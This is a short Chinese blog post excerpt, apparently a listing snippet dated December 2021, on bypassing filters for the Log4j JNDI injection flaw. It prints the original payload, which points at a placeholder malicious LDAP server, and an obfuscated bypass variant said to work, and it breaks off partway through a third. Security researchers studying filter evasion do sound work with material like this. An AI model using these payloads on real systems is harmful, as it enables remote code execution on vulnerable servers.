摘要: 原来的poc: ${jndi:ldap://malicious-ldap-server.com/a} 绕过的poc: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a} 可行 ${jndi:${lo 阅读全文
posted @ 2021-12-17 11:35 ph4nt0mer 阅读(3730) 评论(0) 推荐(0) 编辑